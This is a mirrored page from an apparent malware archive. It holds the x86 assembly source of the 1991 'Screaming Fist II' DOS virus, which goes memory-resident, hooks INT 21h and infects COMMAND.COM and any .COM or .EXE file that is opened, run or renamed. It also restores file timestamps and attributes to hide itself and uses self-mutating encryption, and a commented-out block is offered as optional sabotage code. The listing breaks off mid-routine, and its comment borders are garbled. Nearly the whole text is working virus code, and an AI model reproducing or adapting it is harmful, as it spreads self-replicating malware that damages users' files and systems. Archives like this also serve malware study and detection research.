mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
578 lines
20 KiB
NASM
578 lines
20 KiB
NASM
ORG 100H
|
||
|
||
|
||
; The Screaming Fist II virus (c)1991 by Lazarus Long, Inc.
|
||
; The author assumes no responsibility for any damage incurred
|
||
; from the infection caused by this virus
|
||
|
||
CURTAIN_OPEN EQU $
|
||
|
||
ARE_WE_RESIDENT?:
|
||
CLD ;Do not remove this
|
||
CALL DECRYPT_US
|
||
|
||
NEXT_PLACE:
|
||
|
||
MOV AH,30H ;Get DOS version
|
||
INT 21H
|
||
CMP AL,2 ;Lower than 2?
|
||
JBE LEAVE_AND_RESTORE ;Yes,exit
|
||
XOR AX,AX
|
||
DEC AX ;Will return AX=0 if virus is resident
|
||
INT 21H
|
||
OR AX,AX ;Are we resident?
|
||
JZ LEAVE_AND_RESTORE ;If not, install
|
||
|
||
START:
|
||
PUSH DS
|
||
XOR AX,AX ;Now make DS=0
|
||
MOV DS,AX
|
||
DEC WORD PTR [413H] ;Decrease available memory by 1k
|
||
LDS BX,[0084] ;Get INT 21 vector and save it
|
||
CS:
|
||
MOV [BP+OLD_21_BX-NEXT_PLACE],BX
|
||
CS:
|
||
MOV [BP+OLD_21_ES-NEXT_PLACE],DS
|
||
MOV BX,ES ;Get address of our memory block
|
||
DEC BX
|
||
MOV DS,BX
|
||
SUB WORD PTR [0003],80H ;Decrease memory allocated to this program
|
||
MOV AX,[0012] ;Decrease total memory
|
||
SUB AX,80H ;By 80 paragraphs
|
||
MOV [0012],AX ;And save it again
|
||
MOV ES,AX ;Also gives us ES=Top of memory
|
||
PUSH CS ;CS=DS
|
||
POP DS ;
|
||
MOV SI,BP ;
|
||
SUB SI,OFFSET NEXT_PLACE - 100H ;Offset of code to move
|
||
MOV DI,100H ;ES:100h is destination
|
||
MOV CX,LENGTH ;Move entire virus
|
||
REPZ MOVSB ;Move entire virus to top of memory
|
||
MOV DS,CX ;DS=0
|
||
CLI ;Disable interrupts
|
||
MOV [0086],AX
|
||
MOV WORD PTR [0084],OFFSET NEW_21 ;Set INT 21 to our code in high memory
|
||
STI ;Enable interrupts
|
||
MOV AX,3DFFH ;Code to infect command processor
|
||
INT 21H
|
||
POP DS ;DS=ES
|
||
PUSH DS
|
||
POP ES
|
||
|
||
LEAVE_AND_RESTORE:
|
||
;PUSH DS This is just some silly code
|
||
;XOR AX,AX That will cause random problems
|
||
;MOV DS,AX Like floppies not working
|
||
;IN AL,21H Or the system clock stopping
|
||
;XOR AL,[046CH]B If you want to use it
|
||
;AND AL,0FDH Just remove the semi-colons
|
||
;OUT 21H,AL
|
||
;POP DS
|
||
|
||
SUB BP,OFFSET NEXT_PLACE - 100H ;
|
||
OR BP,BP
|
||
JZ LEAVE_EXE ;A zero BP means we're leaving an .EXE
|
||
LEA SI,[BP+ORIGINAL_EIGHT-NEXT_PLACE+4] ;Restore original eight bytes so
|
||
;we can RET to them
|
||
MOV DI,100H
|
||
PUSH DI ;Restore first four bytes
|
||
MOVSW
|
||
MOVSW
|
||
RET ;And return to 100
|
||
|
||
LEAVE_EXE:
|
||
MOV AX,ES ;Use ES for a displacment value
|
||
ADD CS:OLD_CS_DISP - 100H,AX ;Fix up the CS value
|
||
ADD CS:OLD_SS_DISP - 100H,AX ;And the SS value
|
||
|
||
MOV SS,CS:offset OLD_SS_WORD - 100h ;Set the correct SS
|
||
MOV SP,CS:offset OLD_SP_WORD - 100h ;And the correct SP
|
||
JMP $+2 ;Necessary for .EXE's to run right
|
||
;DO NOT REMOVE! IF YOU DO, .EXE's WON'T RUN!
|
||
|
||
DB ,0EAH, ;Makes a far jump to the original .EXE
|
||
;Entry point
|
||
|
||
ORIGINAL_EIGHT EQU $
|
||
|
||
OLD_IP EQU $
|
||
MOV AH,4CH ;.COM file beginning stored here
|
||
|
||
OLD_CS_DISP EQU $
|
||
INT 21H ;
|
||
|
||
OLD_SS_DISP EQU $
|
||
OLD_SS_WORD DW 00 00 ;Save old SS here
|
||
|
||
OLD_SP EQU $
|
||
OLD_SP_WORD DW 00 00 ;And old SP here
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;Here is where the resident part begins in high memory. ;
|
||
;On systems with 640k, this is usually at segment 9F80 ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|
||
NEW_21:
|
||
PUSHF
|
||
CMP AX,0FFFFH ;AX=FFFF means a program is asking
|
||
JNZ CONTINUE_ASKING ;If the virus is resident
|
||
|
||
POPF ;Return to show that virus is resident
|
||
INC AX ;Return AX=0 to show that we are resident
|
||
IRET
|
||
|
||
CONTINUE_ASKING: ;Infect files on:
|
||
CMP AH,3DH ;Opening
|
||
JZ OPENING
|
||
CMP AH,4BH ;Running
|
||
JZ INFECT_REGULAR
|
||
CMP AH,43H ;Chmod
|
||
JZ INFECT_REGULAR
|
||
CMP AH,56H ;Renaming
|
||
JZ INFECT_REGULAR
|
||
|
||
JMP SHORT OUTTA_HERE
|
||
|
||
OPENING:
|
||
CMP AL,0FFH ;Do we need to infect command processor?
|
||
JNZ INFECT_REGULAR ;Nope, continue
|
||
|
||
PUSH CS ;DS=CS
|
||
POP DS
|
||
MOV DX,OFFSET COMMAND ;If so, let's use C:\COMMAND.COM
|
||
|
||
COM_FILE:
|
||
CALL DISEASE
|
||
POPF
|
||
IRET
|
||
|
||
INFECT_REGULAR:
|
||
|
||
PUSH AX ;Save AX
|
||
CALL CHECK_NAME ;Is DS:DX a .COM or an .EXE file?
|
||
OR AX,AX ;A non-zero AX means nope
|
||
JNZ OUT_WITH_POP
|
||
CALL DISEASE ;Infect file
|
||
|
||
OUT_WITH_POP:
|
||
POP AX ;Restore AX
|
||
OUTTA_HERE:
|
||
POPF ;Continue with old INT 21
|
||
|
||
DB ,0EAH, ;Code for a JMP FAR
|
||
|
||
OLD_21_BX DW 00 00 ;Old Int 21 location is stored here
|
||
OLD_21_ES DW 00 00 ;
|
||
|
||
FUNCTION: ;Used by virus to call old INT 21
|
||
PUSHF
|
||
CALL DWORD PTR CS:[OLD_21_BX]
|
||
RET
|
||
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;This portion handles the actual infection process ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
DISEASE:
|
||
|
||
PUSH AX ;Save all registers
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH DS
|
||
PUSH ES
|
||
PUSH DX
|
||
|
||
ABOVE_2:
|
||
MOV CS:[OLD_DS]W,DS ;Save DS
|
||
MOV CS:[OLD_ES]W,ES ;Save ES
|
||
PUSH CS ;CS=DS=ES
|
||
PUSH CS
|
||
POP DS
|
||
POP ES
|
||
MOV AX,3524H ;Get INT 24 address
|
||
CALL FUNCTION ;
|
||
MOV OFFSET OLD_24_BX,BX ;Save it
|
||
MOV OFFSET OLD_24_ES,ES ;
|
||
MOV AH,25H ;Now set it to our own code
|
||
LEA DX,OFFSET NEW_24 ;Offset of our INT 24 code
|
||
CALL FUNCTION ;
|
||
|
||
MOV AH,36H ;Get disk free space
|
||
XOR DL,DL ;And quit if less than virus length
|
||
CALL FUNCTION
|
||
JC NEED_TO_LEAVE
|
||
OR DX,DX
|
||
JNZ SET_ATTRIBS
|
||
MUL CX
|
||
MUL BX
|
||
CMP AX,LENGTH
|
||
JNB SET_ATTRIBS
|
||
|
||
NEED_TO_LEAVE:
|
||
POP DX ;Clear stack
|
||
JMP DONE ;And return
|
||
|
||
|
||
SET_ATTRIBS:
|
||
POP DX
|
||
PUSH DX
|
||
MOV DS,OLD_DS
|
||
MOV AX,4300H ;Get the attributes
|
||
CALL FUNCTION
|
||
MOV CS:[OLD_ATTRIBS],CX ;Save them for later
|
||
XOR CX,CX
|
||
MOV AX,4301H
|
||
CALL FUNCTION ;Set attribs to normal
|
||
JC LEAVE_WITH_ATTRIBS ;Leave if error
|
||
|
||
OPEN_IT:
|
||
MOV AX,3D02H ;Open file with Read and Write access
|
||
CALL FUNCTION
|
||
JC NEED_TO_LEAVE ;Quit on error
|
||
PUSH CS ;CS=DS
|
||
POP DS
|
||
XCHG BX,AX ;Save handle
|
||
MOV AH,3FH ;Read BUF_LENGTH bytes into CS:BUFFER
|
||
LEA DX,BUFFER ;Offset of buffer
|
||
MOV CX,BUF_LENGTH ;Read 'Em
|
||
CALL FUNCTION
|
||
JC LEAVE_AND_CLOSE ;Quit on error
|
||
CMP OFFSET BUFFER,5A4DH ;Is this an .EXE file?
|
||
JZ NAIL_EXE ;If so, we gotta do some things
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;This portion handles a .COM infection ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
MOV AL,[BUFFER+3]B ;An indentical byte means this .COM is
|
||
INC AL
|
||
CMP AL,[BUFFER+1]B ;probably already infected
|
||
JNZ CONTINUE_TO_INFECT ;If it isn't, let's get it!
|
||
|
||
LEAVE_AND_CLOSE:
|
||
MOV AH,3EH ;Close this file
|
||
CALL FUNCTION
|
||
|
||
LEAVE_WITH_ATTRIBS:
|
||
POP DX
|
||
PUSH DX
|
||
CALL RESTORE_ATTRIBS ;Restore the attributes if needed
|
||
JMP SHORT NEED_TO_LEAVE
|
||
|
||
CONTINUE_TO_INFECT:
|
||
|
||
MOV SI,OFFSET BUFFER ;Starting at CS:BUFFER
|
||
PUSH CS ;CS=ES
|
||
POP ES
|
||
LEA DI,OFFSET ORIGINAL_EIGHT;Where to save original eight bytes to
|
||
MOVSW ;Save infected files original eight bytes
|
||
MOVSW
|
||
|
||
MOV AX,4202H ;Send RW pointer to end of file
|
||
XOR CX,CX
|
||
XOR DX,DX
|
||
CALL FUNCTION
|
||
OR DX,DX ;A non-zero DX means too big of a file
|
||
JNZ LEAVE_AND_CLOSE
|
||
CMP AX,300 ;Don't infect files less than 300 bytes
|
||
JB LEAVE_AND_CLOSE
|
||
CMP AX,64000 ;Or bigger than 64000
|
||
JA LEAVE_AND_CLOSE
|
||
SUB AX,3 ;Use the pointer as our jump code
|
||
MOV [BUFFER]B,0E9H ;Code for absolute JMP
|
||
MOV [BUFFER+1],AX ;This sets up the .COM so we can tell
|
||
DEC AL ;If it's infected next time we see it
|
||
MOV [BUFFER+3],AL
|
||
JMP SHORT ATTACH ;Continue past .EXE infector
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
;This portion handles infecting all .EXE files ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
NAIL_EXE:
|
||
|
||
CMP WORD PTR [BUFFER+14H],1 ;Offset of IP reg. Is this .EXE infected?
|
||
JZ LEAVE_AND_CLOSE ;Leave if already infected
|
||
|
||
GET_EXE:
|
||
MOV AX,[BUFFER+4] ;EXE size in 512 byte pages
|
||
MOV CX,0200H ;Multiply by 512 to get filesize
|
||
MUL CX ;
|
||
PUSH AX ;Save AX, AX=Filesize low byte
|
||
PUSH DX ;Save DX, DX=Filesize high byte
|
||
MOV CL,04 ;
|
||
ROR DX,CL ;
|
||
SHR AX,CL ;
|
||
ADD AX,DX ;
|
||
SUB AX,[BUFFER+8] ;Size of header in 16 byte paragraphs
|
||
PUSH AX ;AX is new code segment displacement
|
||
MOV AX,[BUFFER+14H] ;Get old IP register
|
||
MOV [OLD_IP],AX ;Save it here
|
||
MOV AX,[BUFFER+16H] ;Get old code segment displacement
|
||
ADD AX,10H ;Add 10 to it
|
||
MOV [OLD_CS_DISP],AX ;Save it here
|
||
MOV AX,[BUFFER+14] ;Get old stack segment
|
||
ADD AX,10H ;Adjust it for later
|
||
MOV [OLD_SS_DISP],AX ;And save it here
|
||
MOV AX,[BUFFER+16] ;Get stack pointer
|
||
MOV [OLD_SP],AX ;And save it here
|
||
POP AX ;Restore AX
|
||
MOV [BUFFER+16H],AX ;New code segment
|
||
MOV [BUFFER+14],AX ;New SS=CS
|
||
MOV [BUFFER+16],0FFFFH ;SP = End of viral code
|
||
MOV WORD PTR [BUFFER+14H],1 ;New IP register
|
||
ADD WORD PTR [BUFFER+4],2 ;Size of file in 512 byte pages
|
||
POP CX
|
||
POP DX
|
||
MOV AX,4200H ;Move file pointer
|
||
CALL FUNCTION
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
; Attach our viral code to the target file ;
|
||
; This portion is shared by the .EXE and the .COM infectors to be more ;
|
||
; efficient ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|
||
ATTACH:
|
||
|
||
MOV AX,5700H ;Get the file time and date
|
||
CALL FUNCTION
|
||
PUSH CX ;And save them for later
|
||
PUSH DX
|
||
|
||
INFECT:
|
||
|
||
XOR AX,AX
|
||
MOV DS,AX
|
||
MOV AX,[046CH] ;Get a random encryption key from timer
|
||
MOV DL,AH ;Save part of it in DL
|
||
PUSH CS ;DS=CS
|
||
POP DS ;
|
||
MOV ENC_BYTE,AL ;Save keys in our code
|
||
MOV ENC_BYTE_2,DL
|
||
PUSH CS ;CS=ES
|
||
POP ES
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
|
||
;This section provides a semi-random encryption code mutation based on our <20>
|
||
;encryption keys. Look at each line for a desc. of what it does to the code. <20>
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
|
||
TEST AL,1
|
||
JZ SKIP_1
|
||
XOR WORD PTR ENC_SWITCH,0ABDEH ;MOV SI,BP <=> PUSH BP POP SI
|
||
SKIP_1:
|
||
TEST DL,1
|
||
JZ SKIP_2
|
||
XOR BYTE PTR [ENC_SWITCH_2 + 1],012H ;OR DL,AL <=> XOR AL,DL
|
||
SKIP_2:
|
||
TEST AL,2
|
||
JZ SKIP_4
|
||
XOR BYTE PTR [ENC_SWITCH_4 + 2],010H
|
||
SKIP_4:
|
||
TEST DL,2
|
||
JZ SKIP_5
|
||
XOR BYTE PTR [ENC_SWITCH_5 + 2],010H
|
||
SKIP_5:
|
||
TEST AL,3
|
||
JZ SKIP_6
|
||
XOR BYTE PTR [ENC_SWITCH_1 + 1],08H
|
||
SKIP_6:
|
||
TEST DL,3
|
||
JZ SKIP_7
|
||
XOR BYTE PTR [ENC_SWITCH_3 + 1],08H
|
||
SKIP_7:
|
||
TEST AL,4
|
||
JZ SKIP_8
|
||
XOR BYTE PTR [ENC_SWITCH_6 + 1],08H
|
||
SKIP_8:
|
||
MOV SI,CURTAIN_OPEN
|
||
MOV DI,DATA_END
|
||
PUSH DI
|
||
PUSH DI
|
||
MOV CX,LENGTH
|
||
REPZ MOVSB
|
||
POP SI
|
||
ADD SI,4
|
||
CALL ENCRYPT_US
|
||
POP DX
|
||
MOV AH,40H ;Code for handle write
|
||
MOV CX,LENGTH ;Length of our viral code
|
||
CALL FUNCTION ;Write all of virus
|
||
|
||
MAKE_HEADER:
|
||
MOV AX,4200H ;Set file pointer to beginning
|
||
XOR CX,CX ;Zero out CX
|
||
XOR DX,DX ;Zero out DX
|
||
CALL FUNCTION
|
||
MOV AH,40H ;Write to file
|
||
MOV DX,OFFSET BUFFER ;Starting at BUFFER
|
||
MOV CX,BUF_LENGTH ;Write BUF_LENGTH bytes
|
||
CALL FUNCTION
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
; This restores the files original date and time ;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
|
||
|
||
RESTORE_TIME:
|
||
MOV AX,5701H ;Restore original date and time
|
||
